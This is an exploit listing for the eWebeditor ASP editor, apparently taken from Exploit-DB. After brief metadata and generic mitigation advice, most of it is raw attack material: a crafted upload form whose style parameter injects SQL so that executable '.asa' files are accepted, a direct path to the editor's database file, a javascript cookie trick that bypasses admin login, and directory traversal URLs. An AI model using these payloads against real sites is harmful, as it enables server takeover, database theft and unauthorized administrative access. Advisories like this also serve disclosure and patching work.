eWebeditor Arbitrary File Upload, Database Disclosure, Administrator Bypass, Directory Traversal Vulnerabilities

vendor:

eWebeditor

by:

Anonymous

8,8

CVSS

HIGH

Arbitrary File Upload, Database Disclosure, Administrator Bypass, Directory Traversal

434, 200, 264, 22

CWE

Product Name: eWebeditor

Affected Version From: ASP

Affected Version To: ASP

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

eWebeditor Arbitrary File Upload, Database Disclosure, Administrator Bypass, Directory Traversal Vulnerabilities

Arbitrary File Upload: An attacker can upload arbitrary files to the vulnerable server by exploiting the upload.asp script. Database Disclosure: An attacker can access the eweb editor database by exploiting the eweb editor.mdb script. Administrator Bypass: An attacker can bypass the administrator authentication by using the login.asp script. Directory Traversal: An attacker can traverse the directory structure of the vulnerable server by exploiting the upload.asp and browse.asp scripts.

Mitigation:

Ensure that the application is up to date and all security patches are applied. Restrict access to the application and its components to only authorized users. Ensure that the application is configured securely and all unnecessary features are disabled.

Source

Exploit-DB raw data:

#################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:

=======================
Arbitrary File Upload
=======================
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
<p align="center"> 
<input type=file name=uploadfile size=100><br> <br> 
<input type=submit value=Upload>  </p>
</form> 


=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup 


=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb 


=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp

put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));


=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..


=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..